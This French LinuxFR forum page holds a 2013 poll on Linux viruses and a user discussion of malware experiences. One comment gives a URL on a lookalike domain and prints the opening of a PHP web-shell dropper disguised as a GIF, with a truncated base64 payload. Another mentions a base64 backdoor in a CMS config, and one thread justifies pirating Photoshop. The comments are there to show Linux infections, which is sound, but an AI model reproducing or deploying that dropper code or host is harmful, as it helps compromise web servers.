Sondage La dernière fois que j'ai vu un virus/vers concernant Linux

Posté par (page perso) . Licence CC by-sa
Tags : aucun
11
26
fév.
2013

Il existe des antivirus sous Linux, mais c'est pour scanner les fichiers échangés par Samba, ou les dépôt FTP, ou encore les e-mails.

Linux a des failles, c'est indéniable, mais les virus/vers touchant les système Linux, c'est une réalité ou une légende?

Les cas en émulant un autre système autre qu'un Linux ne comptent pas, mais il serait intéressant d'en lire un commentaire à ce sujet le cas échéant.

À quand remonte la dernière fois que vous avez vu un virus/ver concernant Linux?

  • il y a 5 minutes :
    67
    (1.8 %)
  • hier :
    33
    (0.9 %)
  • la semaine dernière :
    52
    (1.4 %)
  • le mois dernier :
    30
    (0.8 %)
  • l'an dernier :
    48
    (1.3 %)
  • plus d'un an :
    148
    (3.9 %)
  • incapable de m'en souvenir :
    489
    (13.0 %)
  • jamais, mais mon entourage oui :
    73
    (1.9 %)
  • jamais, même pas par mon entourage :
    2321
    (61.9 %)
  • 42 :
    487
    (13.0 %)

Total : 3748 votes

La liste des options proposées est volontairement limitée : tout l'intérêt (ou son absence) de ce type de sondage réside dans le fait de forcer les participants à faire un choix. Les réponses multiples sont interdites pour les mêmes raisons. Il est donc inutile de se plaindre au sujet du faible nombre de réponses proposées, ou de l'impossibilité de choisir plusieurs réponses. 76,78% des sondés estiment que ces sondages sont ineptes.
  • # Jamais, mais...

    Posté par . Évalué à  10 .

    Jamais, mais si ça se trouve, je suis juste infecté et ignorant. Comment savoir ? Certes, mon routeur / firewall ne me signale pas de trafic suspect, mais par ailleurs sa politique de sortie par défaut est le plus souvent à ALLOW.

    Comment vous assurez-vous que vos systèmes Linux sont exempts de virus ?

    • [^] # Re: Jamais, mais...

      Posté par . Évalué à  8 .

      Ou alors tu as un comportement qui te met à l'abri quelque soit l'OS.
      La dernière fois que j'ai vu un virus sur une de mes machines c'était sous DOS en insérant des disquettes. Et pourtant entre le boulot et les jeux je dois passer plus de 50% de mon temps sous windows réputé passoire. Ces 10 dernières années je n'ai jamais vu un antivirus bloquer un virus et je n'ai jamais eu le moindre symptôme étrange qui ne soit pas lié directement à l'OS.
      Après y'a des gens qui sont spécialisés dans les virus mais à mes yeux ils ont souvent d'autres habitudes étranges comme l'usage de 37 barres de recherches exotiques sur leur navigateur favori…

      • [^] # Re: Jamais, mais...

        Posté par . Évalué à  8 .

        heu.. même avec un comportement qui me met à l'abri des virus, ça m'est déjà arrivé de voir mon Windows XP du boulot infecté à l'insu-de-mon-plein-gré, et certainement pas en browsant des sites warez ni en cliquant sur un .EXE téléchargé d'internet, le tout en étant protégé derrière un firewall/routeur (nb: après enquête succincte, une faille java).

        Bref même avec l'expérience, la connaissance des problèmes et le comportement sain on se retrouve parfois infecté (d'où l'importance d'avoir un système à jour).

        • [^] # Re: Jamais, mais...

          Posté par . Évalué à  6 .

          Pareil, j’ai des souvenirs pas si lointains où une installation toute neuve sous XP était devenue complètement infecté (le plus cool c’était le visuel) sans aucune utilisation, juste en étant connecté au net sans NAT. Et ça en quelques minutes après installation.

          • [^] # Re: Jamais, mais...

            Posté par . Évalué à  9 .

            Ça me rappelle l'époque où un XP (<SP2 ou <SP3, me souviens plus) avait une espérance de vie de quelques minutes une fois connecté à Internet sans protection.

            Un ver dont j'ai oublié le nom s'était massivement répandu, les ordinateurs tombaient comme des mouches, les gens réinstallaient, configuraient Internet pour télécharger/mettre à jour l'antivirus et les pilotes, et avant même la fin étaient de nouveau infectés. Bref, il suffisait de prendre ses précautions avant de le connecter, mais c'était hors de portée de l'utilisateur moyen. J'ai vu des gens racheter des PC rien qu'à cause de ça, fallait voir les factures présentées par certaines boîtes informatique pour nettoyer les machines…

            C'est l'époque où je me suis rendu compte que, même en ayant une parfaite hygiène informatique, et donc en n'étant jamais infecté par une saleté, je devais régulièrement rebalancer l'image Ghostée que j'avais fait de mon système afin de résoudre des problèmes de lenteur ou de système devenu instable pour diverses raisons foireuses (liées à un système pas très bien pensé), parce que c'était tout simplement plus rapide que de perdre son temps à chercher à résoudre les problèmes en question.

            C'est là où je suis passé à Linux, et chaque intervention que je fais sur un Windows me conforte dans l'idée que jamais je ne réinstallerai ce système sur mes machines, et ce même si Windows 7 était devenu potable, Windows 8 étant en train d'en faire un truc indigeste au possible de toute façon.

            • [^] # Re: Jamais, mais...

              Posté par (page perso) . Évalué à  5 .

              Un ver dont j'ai oublié le nom s'était massivement répandu, les ordinateurs tombaient comme des mouches, les gens réinstallaient, configuraient Internet pour télécharger/mettre à jour l'antivirus et les pilotes, et avant même la fin étaient de nouveau infectés. Bref, il suffisait de prendre ses précautions avant de le connecter, mais c'était hors de portée de l'utilisateur moyen.

              Blaster, Sasser ?

              • [^] # Re: Jamais, mais...

                Posté par (page perso) . Évalué à  3 .

                Tu peux rajouter Nimda, Code_Red et Conficker… Sinon, il y a GNU/Linux pour faire disparaître tout souci avec Windows :-)

              • [^] # Re: Jamais, mais...

                Posté par . Évalué à  2 .

                Merci, c'était donc Blaster. Je crois que ce ver à lui tout seul a fait plus pour la démocratisation de Linux que les évangélistes du libre les années précédentes. Il faudrait vérifier, mais j'ai l'impression qu'à cette époque, il a rencontré beaucoup d'échos.

        • [^] # Re: Jamais, mais...

          Posté par (page perso) . Évalué à  2 .

          Le dernier virus que j'ai pris était sous Windows, mais même pas à cause de windows: j'ai découvert ce jour là qu'il suffisait de mettre en bande-son d'un mail kikoolol un joli exécutable et hop: windows fait le travail à ta place, petit scarabée!

          Outlook était configuré par défaut pour afficher les mails kikoolol les plus flashy, et je me suis fait avoir!

          Le virus a évidemment envoyé le mail à tout mon carnet d'adresse, c'était le PC du labo, ça a fait des centaines d'heureux ce mail tout flashy avec une bande-son détonnante…

      • [^] # Re: Jamais, mais...

        Posté par . Évalué à  1 .

        Les clés USB sont des vecteurs de transmission de virus assez impressionnants. N'utilisant Windows qu'occasionnellement, j'ai déjà trouvé plusieurs fois sur ma clé USB en FAT32 après un cours séjour dans un PC sous windows des fichiers étranges tout à fait compatible avec des virus vers et qui plus est signalé par l'un ou l'autre antivirus.

        Ça fait froid dans le dos…

        Les virus sous linux sont moins fréquent, parce que la cible d'utilisateurs n'est pas la même. D'autre part, l'OS étant beaucoup installé sur des serveurs, il doit être robuste pour se protéger des intrusions.

        La gestion des droits est aussi meilleure. Après je suis persuadé qu'on peut écrire des virus pour linux.

        Systemd, the bright side of linux, toward a better user experience and on the road to massive adoption of linux for the desktop.

        • [^] # Re: Jamais, mais...

          Posté par (page perso) . Évalué à  1 .

          Est ce que Linux lance automatiquement le premier exécutable (genre autorun.bash?) présent sur une clef lors de son insertion?

          Peu de gens connaissent l'intérêt de la touche majuscule au montage d'un volume, et par défaut, cliquer sur un volume revient à 'exécuter' alors que la plupart des gens veulent 'parcourir'.

          Conception de base… pour le pus grand profit de certains, mais pas de l'utilisateur.

          • [^] # Re: Jamais, mais...

            Posté par (page perso) . Évalué à  4 .

            le gars qui a imaginé l'exécution automatique lors de l'insertion d'un cdrom ou d'une clé usb était un parfait imbécile, de même que celui qui a caché par défaut les extensions de fichiers, et ceux qui ont validé ces comportements pour le rendre actif sur des millions d'ordinateurs l'étaient encore plus.

            Ceux qui affirment ne plus jamais avoir vu de malware tous OS confondu doivent avoir tous les amis geeks, parce que de mon côté je ne vois que cela, sur clé usb, mais également en attaque avec un simple surf depuis le navigateur (faille en Flash semble-t-il).

            « I approve of any development that makes it more difficult for governments and criminals to monopolize the use of force. » Eric Raymond

            • [^] # Re: Jamais, mais...

              Posté par (page perso) . Évalué à  2 .

              Le sondage concernait Linux… sinon il faudrait réduire les périodes :)

              Il y a aussi le truc sympa de truc USB qu'on insère, qui se déclare comme clavier, et qui commence à lancer des commandes…

            • [^] # Re: Jamais, mais...

              Posté par (page perso) . Évalué à  -4 .

              Non c'est celui qui utilise l'exécution automatique lors de l'insertion d'un disque qui est un idiot car il ne se rend pas compte du danger que ça représente.

              Aussi, ne pas avoir vu de malware ne signifie pas qu'ils ne sont pas présents :)

            • [^] # Re: Jamais, mais...

              Posté par . Évalué à  3 .

              Ceux qui affirment ne plus jamais avoir vu de malware tous OS confondu

              Sauf que l'on ne parlait que de linux (pas "tout OS confondu" donc) et que l'on parlait d'un type précis de malware: le virus, qui est un type de virus qui se propage localement (sur un réseau, ça s'appelle un vers) dans les fichiers, de nos jours généralement à coups de script (vba, notamment) et par le passé via du code binaire (j'imagine que ça se fait encore, mais sûrement de moins en moins vu que la sécurité windows ne cesse de cloisonner de plus en plus les fichiers. Bonne chose.).

              Pour le coup, non, je n'ai pas que des amis geek, loin de la. Mais, vraiment, les virus, sous linux, je n'en ai jamais vus. Après, j'suis un jeunot, ça fait grosso modo 3 ans que j'utilise une distro linux en tant que système principal, ce n'est pas énorme.

        • [^] # Re: Jamais, mais...

          Posté par . Évalué à  2 .

          Ça fait froid dans le dos…

          Moi j'ai du mal à comprendre comment ça marche encore ces trucs. Ca fait des années que je vois passer des niouzes qui disent "maintenant c'est bon, plus de risques, plus d'autorun, etc", et malgré ça, force est de constater que le canal existe toujours.

          La gestion des droits est aussi meilleure.

          Euuuhhhhh non. La gestion des droits par défaut (genre les "utilisateurs avec pouvoir") peut-être, mais quand on connait un peu, on se rend compte qu'on peut coller des ACL sur tout et n'importe quoi.

    • [^] # Re: Jamais, mais...

      Posté par . Évalué à  5 .

      Bonjour,

      Le problème avec les antivirus est que bien souvent ils ne fonctionnent que dans un mode 'réactif'.
      Par ce terme s'entend le fait de ne pouvoir détecter que quelque chose de déjà identifié.
      Bien sur il existe des acteurs qui vont se baser sur une approche plus proactive dirons-nous mais là encore, difficile d'atteindre 100% de certitude.

      Ce que je fais sur mes systèmes est bien entendu d'utiliser un antivirus mais surtout de superviser ce que font les différentes machines.

      • pas (trop) de différences dans le nombre de processus en action
      • pas de trafic réseau anormal
      • etc.

      Salutations.

    • [^] # Re: Jamais, mais...

      Posté par . Évalué à  -10 .

      En sécurité, on "s'en fout" de ce qui rentre dans son réseau. Par contre pas de ce qui sort…

  • # Pas vu de véritable virus depuis bien longtemps...

    Posté par . Évalué à  8 . Dernière modification : le 26/02/13 à 12:00

    … y compris sous windows.

    Ha, ça, les chevaux de troie, les adwares, oui, à la pelle (chez les autres, et ils sont simples à repérer et éliminer, en général, surtout avec un peu d'aide: http://assiste.com.free.fr/ ). Les virus et les vers, en revanche… vraiment, ça fait longtemps.
    Après, ça dépend du comportement de l'utilisateur, aussi. Tant qu'on évite les sites à la "moralité douteuse" et qu'on clique pas sur le 1er truc qui ressemble à un attrape-couillon, m'est avis qu'on échappe à 80% des emmerdes.
    Pour les 20% restant, choisir des logiciels alternatifs quand c'est possible (top 3 des logiciels à éviter: adobe pdf reader, messenger - obsolète de toute façon -, IE ) permet d'éviter de s'exposer aux failles des logiciels les plus utilisés (donc les plus ciblés). Sachant que souvent ces logiciels se sont imposés il y a longtemps, il est même fréquent que les logiciels alternatifs soient de meilleure qualité, juste moins connus.
    Doit ensuite rester une fenêtre du genre 1%/2%, mais même un antivirus ne sera pas capable de réduire le risque à 0, peu importe le système.

    Après, suis pas expert sécu non plus, si ça se trouve, toutes mes machines sont hyper vérolées, mais, comment savoir?

    • [^] # Re: Pas vu de véritable virus depuis bien longtemps...

      Posté par (page perso) . Évalué à  6 .

      Après, suis pas expert sécu non plus, si ça se trouve, toutes mes machines sont hyper vérolées, mais, comment savoir?

      l'avantage de sasser c'est qu'on savait :)

    • [^] # Re: Pas vu de véritable virus depuis bien longtemps...

      Posté par . Évalué à  -7 . Dernière modification : le 26/02/13 à 13:32

      Après, suis pas expert sécu non plus, si ça se trouve, toutes mes machines sont hyper vérolées, mais, comment savoir?

      Ceux qui sont vraiment capable de se cacher, tu ne les interesses pas.
      Les autres etant des branleurs pour la pluspart, soit tu le sais quasi direct quand t'as fait une connerie, soit tu te fais pas contaminer de base.

      Mon dernier virus sur un machine a moi…je l'ai lance moi meme comme un con apres avoir detecte que cela en etait un….(jai confondu la machine virtuelle et ma machine)

      (j'essayais de trouver un crack pour photoshop pour une amie a moi qui a ni les moyens de payer, ni les competences pour passer sous gimp, et qui en a VRAIMENT l'utilite)

      Le seul vrai virus que j'ai choppe sinon c'etait a l'epoque de Win98, un virus de boot….

      Globalement….j'aurais plus peur de me faire infecter sans le savoir sous Linux que sous Windows. (question d'habitude du systeme)

      • [^] # Re: Pas vu de véritable virus depuis bien longtemps...

        Posté par (page perso) . Évalué à  10 .

        (j'essayais de trouver un crack pour photoshop pour une amie a moi qui a ni les moyens de payer, ni les competences pour passer sous gimp, et qui en a VRAIMENT l'utilite)

        Allez Assume ! Pas besoin de se justifier, ça reste illégal de toute façon :)

        • [^] # Re: Pas vu de véritable virus depuis bien longtemps...

          Posté par . Évalué à  -3 .

          Je ne sais pas me servir de Photoshop :) (et encore moins de Gimp) et surtout je n'en ai AUCUNE utilite :) j'utilise paint, et quand VRAIMENT je dois depasser une rotation d'image, j'utilise paint.net :p

          Je sais meme pas enlever les yeux rouges sur une photo, mais comme je prends pas de photos je m'en fous :)

          Voila, j'assume pleinement le fait d'avoir aider une amie a pirate toshop :). (Je crois que les seuls trucs pirates (en logiciel) qui me restent sous les ROMS de jeu d'arcades de Mame)

          • [^] # Re: Pas vu de véritable virus depuis bien longtemps...

            Posté par (page perso) . Évalué à  10 .

            Je ne doute pas de ta bonne foi, c'est juste la forme du type : « c'était pour ma grand mère en fin de vie qui fait des photos pour mes petits cousins orphelins en prison en Roumanie, et qui mangent du poney…», qui m'a laissé dubitatif. Tu connais l'adage : « Si tu cherches le coupable, regardes en premier celui qui a le plus d'alibis.» Ben ça marche aussi pour celui qui se justifie un peu trop :)

            A une époque pas si lointaine, on pouvait avoir l'accord (de principe) d'Adobe pour publier des œuvres créées avec des versions pirates de leurs logiciels, et ce, tant qu'on faisait de la publicité pour eux via une mention « fait avec Photoshop ». Vu le prix de la licence aussi…. Mais bon, maintenant il y a the Gimp qui tue de l'Ours en barre, alors ça va ! Et ça évite de se choper des virus en cherchant des cracks : un autre avantage du libre !

            Pour les roms, tant que t'as les originaux il y a pas de problème !
            Après tout 500 euros pour jouer à Metal Slug 3, ça vaut son prix :)

        • [^] # Re: Pas vu de véritable virus depuis bien longtemps...

          Posté par (page perso) . Évalué à  10 .

          un crack pour photoshop pour une amie a moi qui a ni les moyens de payer, ni les competences pour passer sous gimp

          Si elle a les compétences pour utiliser Photoshop, elle les a aussi pour GIMP. Les deux logiciels sont différents, mais GIMP n'est pas plus compliqué. Elle aurait peut-être juste passé un peu plus de temps pour le prendre en main, mais c'est pour son bien.

        • [^] # Re: Pas vu de véritable virus depuis bien longtemps...

          Posté par . Évalué à  2 . Dernière modification : le 27/02/13 à 21:54

          Et quand la copine aura un peu grandi, il faudra lui montrer que le mode monofenêtre ne sert à rien qu'à encombrer l'écran…

      • [^] # Re: Pas vu de véritable virus depuis bien longtemps...

        Posté par (page perso) . Évalué à  10 .

        Allez je me dévoue pour faire le relou.

        (j'essayais de trouver un crack pour photoshop pour une amie a moi qui a ni les moyens de payer, ni les competences pour passer sous gimp, et qui en a VRAIMENT l'utilite)

        Soit elle en a besoin pour son boulot, et alors, si elle n'arrive même pas à financer ses outils de travail, il faut qu'elle envisage une reconversion ; soit elle n'en a pas VRAIMENT l'utilité.

        • [^] # Re: Pas vu de véritable virus depuis bien longtemps...

          Posté par . Évalué à  -1 .

          Elle est photographe "amateur" et est a l'AAH…

          Donc si elle en a l'utilite, ET vous raurez beau dire et beau faire, il y a beaucoup plus de tutoriaux et plugin Photoshop que de tutoriaux Gimp, sans compte tout l'experience qu'elle a aquise precedemment….(quand Gimp etait bien pourri, ca fait pas d'hier qu'elle a commence)

          fin bref, je me fous bien de ce que vous pensez en fait…

          • [^] # Re: Pas vu de véritable virus depuis bien longtemps...

            Posté par (page perso) . Évalué à  4 .

            Il y a plus de tutoriels pour Photoshop que pour The Gimp parce que Photoshop est compliqué à prendre en main.

            Ensuite, en parlant des plugins et des extensions, ceux qui sont sous windows ont plus de difficultés pour installer les extensions Python et Perl de Gimp, alors que sous Linux il suffit de les sélectionner dans le gestionnaire de paquets.

            The Gimp est toujours plus agréable à utiliser sous Linux. Pareil pour les autres gros logiciels (Suite Libre-office)…

          • [^] # Re: Pas vu de véritable virus depuis bien longtemps...

            Posté par (page perso) . Évalué à  10 .

            Elle est photographe "amateur" et est a l'AAH…

            Et ? Photoshop est plus accessible que GIMP (si tant est que son handicap impacte l'utilisation d'un ordinateur) ? Ou c'est une manœuvre à la TF1 pour apitoyer ?

            fin bref, je me fous bien de ce que vous pensez en fait…

            Ça en fait, des justifications, pour quelqu'un qui s'en fout :-D

          • [^] # Re: Pas vu de véritable virus depuis bien longtemps...

            Posté par (page perso) . Évalué à  10 .

            , il y a beaucoup plus de tutoriaux et plugin Photoshop que de tutoriaux Gimp, sans compte tout l'experience qu'elle a aquise precedemment

            Et donc elle utilisera toute sa vie ce produit ? L'outil informatique évolue, cela nécessite de se former continuellement (comme pour d'autres professions). Quant au nombre de tutoriels, je suis sûr qu'il y a plus pour Photoshop, mais il y a de très nombreux sur GIMP aussi, il y a même des formations pro dessus. Bref, elle a le droit de préférer Photoshop, mais ne lui cherche pas de mauvaises excuses. Quelque chose me dit que si elle n'avait personne pour lui procurer des cracks, elle serait déjà passée à GIMP pour ne pas payer le prix de la licence.

            • [^] # Re: Pas vu de véritable virus depuis bien longtemps...

              Posté par . Évalué à  -1 . Dernière modification : le 27/02/13 à 14:34

              Quelque chose me dit que si elle n'avait personne pour lui procurer des cracks, elle serait déjà passée à GIMP pour ne pas payer le prix de la licence.

              Ou elle restera sur ses habitudes. En fait ce n'est guere mon probleme.
              Je parlais avant tous des seules raisons pour laquelle j'ai vu apparaitre un virus sur ma machine. Et la les trolls GIMP ont rapplique en masse vur que ca parlait de Toshop. J'aurais parle d'Office j'aurais eu les trolls Open(libre) Office. Et pareil pour n'importe quel logiciel avec 'equivalent' libre. Bref des trolls passant a cote du message.

              C'est avant tout une question d'habitude d'utilisation de la machine. Les virus/woms/whatever vraiment invisibles, ce sont des trucs tres cibles reserves a des cibles identifies. La machine de Michu ca interesse pas ces gens la, le rapport signal/bruit pour la personne le controlant serait trop grand.

          • [^] # Re: Pas vu de véritable virus depuis bien longtemps...

            Posté par . Évalué à  6 .

            Moi je vais me reconvertir en développeur, mais vous comprenez, comme je n'ai pas de sous, je vais pirater Visual Studio. C'est pour manger, rien de personnel !

            Article Quarante-Deux : Toute personne dépassant un kilomètre de haut doit quitter le Tribunal. -- Le Roi de Cœur

            • [^] # Re: Pas vu de véritable virus depuis bien longtemps...

              Posté par . Évalué à  -5 .

              Moi je vais me reconvertir en développeur, mais vous comprenez, comme je n'ai pas de sous, je vais pirater Visual Studio. C'est pour manger, rien de personnel !

              Va s'y si l’arrives a en vivre, tu finiras certainement par te payer la licence un jour ou l'autre, et tu le feras certainement pour pas avoir a te faire chier a chercher des cracks véroles, ou d’être emmerde par les mises a jour etc.

              Ces societes n'etant pas honnetes avec le fisc, il n'y a nul obligation morale de l'etre envers elles.

              Et nos politiciens n'etant absolument pas honnetes non plus (vive le regime electif qui ne peut mener qu'a ca)
              pas de raison de respecter les lois quils ne votent guere que pour eux meme…

              • [^] # Re: Pas vu de véritable virus depuis bien longtemps...

                Posté par (page perso) . Évalué à  8 .

                Disclaimer : les propos qui suivent ne reflètent pas nécessairement mes croyances et convictions personnelles.

                Ces societes n'etant pas honnetes avec le fisc, il n'y a nul obligation morale de l'etre envers elles.

                Ça fait environ deux millénaires que la civilisation occidentale te donne tort, en ayant remplacé le talion par le pardon.


                Et sinon, dans le panel des justifications, on a eu :

                • elle peut pas payer mais elle en a réellement besoin
                • elle est handicapé alors un peu d'indulgence
                • peut-être un jour elle paiera pour se rattraper
                • ils sont méchants alors bien fait pour eux que je pirate

                Tu as conscience de t'enfoncer ?

                • [^] # Re: Pas vu de véritable virus depuis bien longtemps...

                  Posté par . Évalué à  -7 . Dernière modification : le 28/02/13 à 18:21

                  elle peut pas payer mais elle en a réellement besoin

                  L'utilite pas 'besoin'

                  elle est handicapé alors un peu d'indulgence

                  je parlais de ses moyens

                  peut-être un jour elle paiera pour se rattraper

                  rien a voir avec se rattraper mais 'jsute pour pas se faire chier

                  ils sont méchants alors bien fait pour eux que je pirate

                  Ils sont mechants donc en fait rien a foutre qu'on les pirate ou pas…rien avoir avec une quelconque vengeance, chacun sa merde…

                  Tu as conscience de t'enfoncer ?

                  Tu as conscience que tu sais pas lire ?

            • [^] # Re: Pas vu de véritable virus depuis bien longtemps...

              Posté par . Évalué à  7 .

              Même pas besoin de mentir et de voler : Microsoft "offre" la première dose gratuitement (et avec quelques limitations), ça s'appelle Visual Studio Express.

              BeOS le faisait il y a 15 ans !

    • [^] # Re: Pas vu de véritable virus depuis bien longtemps...

      Posté par . Évalué à  7 .

      ouèp, ben moi j'ai déjà vu un virus windows s'installer sous wine. Une vraie plaie croyez moi ma bonne dame !

      Systemd, the bright side of linux, toward a better user experience and on the road to massive adoption of linux for the desktop.

      • [^] # Re: Pas vu de véritable virus depuis bien longtemps...

        Posté par . Évalué à  2 .

        ouèp, ben moi j'ai déjà vu un virus windows s'installer sous wine. Une vraie plaie croyez moi ma bonne dame !

        Chez moi, j'ai prévu le truc en sauvegardant le dossier wine de l'utilisateur principal, en cas d'attaque je rm -R ce dossier et je fais un rsync de la sauvegarde.

        L'"avantage" de wine sur windows dans ce cas est que l'attaque ne se propagera ni au système ni aux autres utilisteurs.

      • [^] # Re: Pas vu de véritable virus depuis bien longtemps...

        Posté par . Évalué à  2 .

        Pareil, le seul que j'ai jamais eu, en tous cas que j'ai vu.

        Un obscure programme pour Windows (je ne sais pu quel était le besoin), je sais que ça pue mais clamav n'est pas installé, la flemme tout ça, je me dis : « Bof aller, faut vivre dangereusement ! » et je l'exécute direct avec wine. Heureusement que j'avais pas beaucoup de programmes sous Wine (1 en fait) parce que wine j'ai été obligé de le désinstaller et de faire un rm de ~/.wine !

        Vecteur de contamination classique : interface chaise-clavier :)

        Des fois je me mets à imaginer que toutes mes box sont rootées, que des anonymous observent mes communications à l'aide du micro ou de la webcam, que Debian possède une backdoor des plus sophistiquée connue d'un cercle restreint de seigneurs des NTIC… Là on me donne une pilule bleu et je dois retourner dans ma chambre pour qu'on m'attache à mon lit.

        • [^] # Re: Pas vu de véritable virus depuis bien longtemps...

          Posté par (page perso) . Évalué à  3 .

          Des fois je me mets à imaginer que toutes mes box sont rootées, que des anonymous observent mes communications à l'aide du micro ou de la webcam, que Debian possède une backdoor des plus sophistiquée connue d'un cercle restreint de seigneurs des NTIC… Là on me donne une pilule bleu et je dois retourner dans ma chambre pour qu'on m'attache à mon lit.

          Tu peux me dire un truc? Ce serait une révélation:
          -T'es une femme?
          -T'as possédé un Apple?
          -T'as cassé les couilles à un mec de la hotline pendant une plombe pour te plaindre que "les gens du réseau" mettaient ton ordinateur de force sur internet via le boitier d'alim (parce que y'a pas de modem sur ta machine)?

    • [^] # Re: Pas vu de véritable virus depuis bien longtemps...

      Posté par (page perso) . Évalué à  5 .

      Tant qu'on évite les sites à la "moralité douteuse"

      Et c'est quoi la moralité douteuse d'un site ?

      * Ils vendront Usenet quand on aura fini de le remplir.

  • # Il y a cinq minutes…

    Posté par (page perso) . Évalué à  10 .

    et sur le site du projet GNU, en plus !

  • # Il y en a partout!

    Posté par . Évalué à  10 .

    Pour le sondage: Il y a 5mn.
    Tout le monde imagine un petit virus "à la windows" et rigole en disant que ça n'existe pas sous linux, mais il en existe d'autres types.

    Premier cas: on en parlait y'a pas 5mn, c'était même en main page de linuxfr avec du sshd vérolé: d'où il vient, et comment il se promène? Il y a de grandes chances que ce soit de manière automatique. Vous en voulez d'autres? J'en ai là:
    http://picasa.com.playteck.net/indeks.php

    On note tout d'abord la présence d'esprit du pirate en utilisant un nom de domaine qui ressemble à un nom connu. Le pirate utilise une deuxième méthode d'évasion pour la détection:
    Si vous d/l le fichier php et que vous faites un file, ça vous dit:
    $ file indeks.php
    indeks.php: GIF image data, version 89a, 16129 x 16129

    alors que quand on regarde dedans on retrouve du code php…
    $ cat indeks.php
    GIF89a?????ÿÿÿ!ù????,???????D?;?<?php
    @error_reporting(0); @set_time_limit(0); $lol = $_GET['lol']; $osc = $_GET['osc'];
    $shell_data = "aWYgKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSBvciBzdHJ0b2xvd2VyKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSkgPT0 (snip...)

    Un petit dropper pas trop méchant, je vous épargne les véritables attaques que je vois. Sauf que ce genre de trucs:
    -ça se promène tout seul
    -ça se duplique tout seul
    -ça infecte du linux
    Et ça, ça ressemble furieusement à la définition d'un virus sous linux.

    • [^] # Re: Il y en a partout!

      Posté par . Évalué à  5 .

      Juste concernant ta remarque sur sshd : en l’occurrence le "comment il se promène" est connu et n'a rien à voir avec sshd.
      Les pirates ont eu tout simplement le mot de passe du compte root :p
      La base de données du support de cpanel a fuitée, et celle-ci contenait les comptes root, que les utilisateurs n'ont pas changé après l'avoir donné au support.

      Je te renvoies à ce thread de commentaires sur la dépêche que tu cites pour plus d'explications : http://linuxfr.org/news/infection-par-rootkit-sshd-spam-sur-des-serveurs-rhel-centos#comment-1432562

      Sinon pour en revenir au sujet, bien sûr que les rootkits, les shellcodes, les virus, vers, etc ont de beaux jours devant eux sous Linux, d'autant qu'on le trouve dans un nombre de plus en plus élevé d'équipements : voitures, frigo, téléphone, domotique, robotique, etc… Inévitablement nous serons de plus en plus ciblés.

      Maintenant, si on a une utilisation réfléchie de l'outil informatique, que nous avons un minimum de reflexes de sécurité (comme on ferme son appartement en partant de chez soi), et qu'on a pas des panneaux lumineux indiquant qu'un trésor est enfoui chez soi, on risque relativement peu de choses.

      • [^] # Re: Il y en a partout!

        Posté par . Évalué à  3 .

        Les pirates ont eu tout simplement le mot de passe du compte root :p

        Je pense pouvoir affirmer que le vol d'identité par récupération du mot de passe est en effet le plus souvent utilisé par du « regarder par dessus l'épaule » ou de l'ingénierie sociale. Le temps des concentrateurs et des protocoles avec mot de passe en clair commencent à faire partie de l'histoire ancienne.

        En cas d'exploit qui provoquerait une « escalade des privilèges », récupérer les mots de passe du système n'est plus du tout d'une quelconque utilité, en tous cas pas une priorité :)

    • [^] # Re: Il y en a partout!

      Posté par . Évalué à  1 .

      Vu il y a quelque mois un vers qui rajoutait des pages et des liens pour des warez dans un CMS. Le vers consistait en un ajout dans le fichier php de configuration d'un morceau de code php encodé en base64 et zippé.

      Bon puis y'a EICAR que j'avais installé sur ma machine, mais là ça ne compte pas ;-)

    • [^] # Re: Il y en a partout!

      Posté par (page perso) . Évalué à  2 .

      Là, le problème est différent, il est même totalement indépendant de l'OS.

      Ce virus nécessite Apache + php pour fonctionner.
      Sous Nginx, il n'aurait pas d'effet, parce que par défaut les images ne sont pas envoyées à l'interpréteur php, alors que c'est le cas pour Apache.

      Ensuite, tous les serveurs ne sont pas forcément vulnérable à l'exécution de commandes shell… ça dépend des admin-sys.

      Sous Linux, les autres utilisateurs ne sont pas impactés (et encore, il faut rendre le fichier excutable, ou avoir ce qu'il faut pour qu'il soit interprété)

      Sous windows, la plupart des gens étant admin de leur sessions, tout le système est compromis.

      Je ne vois pas trop en quoi ce fichier est dangereux.

      • [^] # Re: Il y en a partout!

        Posté par . Évalué à  6 .

        Sous windows, la plupart des gens étant admin de leur sessions, tout le système est compromis.

        Pas depuis Vista qui date de 2006.

        "Quand certains râlent contre systemd, d'autres s'attaquent aux vrais problèmes." (merci Sinma !)

        • [^] # Re: Il y en a partout!

          Posté par (page perso) . Évalué à  2 .

          Tout dépend comment le constructeur prépare le système : il y a encore des fournisseurs (Dell et HP à ma connaissance) qui proposent de créer un compte "utilisateur" lors du premier démarrage de la machine, qui sera vraisemblablement utilisé par l'utilisateur au quotidien, et ce compte dispose des privilèges administrateurs, même s'il n'en porte pas le nom.

          Oui, Microsoft a fait des progrès en terme de sécurité, mais tant que les fournisseurs proposeront des installations "moisies" par défaut et que de plus des éditeurs ne proposent pas de logiciels fonctionnant "normalement" sous un compte utilisateur (je n'ai pas de référence en tête, mais cela doit pouvoir se trouver) alors la sécurité des systèmes Windows en absence d'administrateur système compétent (particuliers, PME/PMI, professions libérales, …) reste un problème.

          C'est une question d'éco-système ; où l'on retrouve aussi des aspects commerciaux et juridiques (vente liée).

          • [^] # Re: Il y en a partout!

            Posté par . Évalué à  1 .

            Tout dépend comment le constructeur prépare le système : il y a encore des fournisseurs (Dell et HP à ma connaissance) qui proposent de créer un compte "utilisateur" lors du premier démarrage de la machine, qui sera vraisemblablement utilisé par l'utilisateur au quotidien, et ce compte dispose des privilèges administrateurs, même s'il n'en porte pas le nom.

            Jamais vu ça. Vu que l'UAC se limite par défaut à un OUI/NON et est moins "intrusive" dans Windows 7, je vois pas trop l'intérêt non plus…

            de plus des éditeurs ne proposent pas de logiciels fonctionnant "normalement" sous un compte utilisateur (je n'ai pas de référence en tête, mais cela doit pouvoir se trouver)

            Pas vu ce genre de logiciels depuis le début des années 2000.

            "Quand certains râlent contre systemd, d'autres s'attaquent aux vrais problèmes." (merci Sinma !)

            • [^] # Re: Il y en a partout!

              Posté par . Évalué à  3 .

              Je confirme pour les préinstall de Dell, le premier nom rentré dans la liste fait forcement partie du groupe administrateur. Ce qui n'a aucune importance lorsqu'on réinstalle les machines from scratch à la réception.
              Et je confirme aussi pour les logiciels métier qui ne fonctionnent qu'en tant qu'administrateur, c'est la norme ici. On peut aussi les faire fonctionner en mode utilisateur normal si on se fade le packaging. Car bien évidement ces logiciels ne sont pas packagés, on modifie via des .bat des lignes dans la base de registre et on copie des fichiers dans des répertoires.

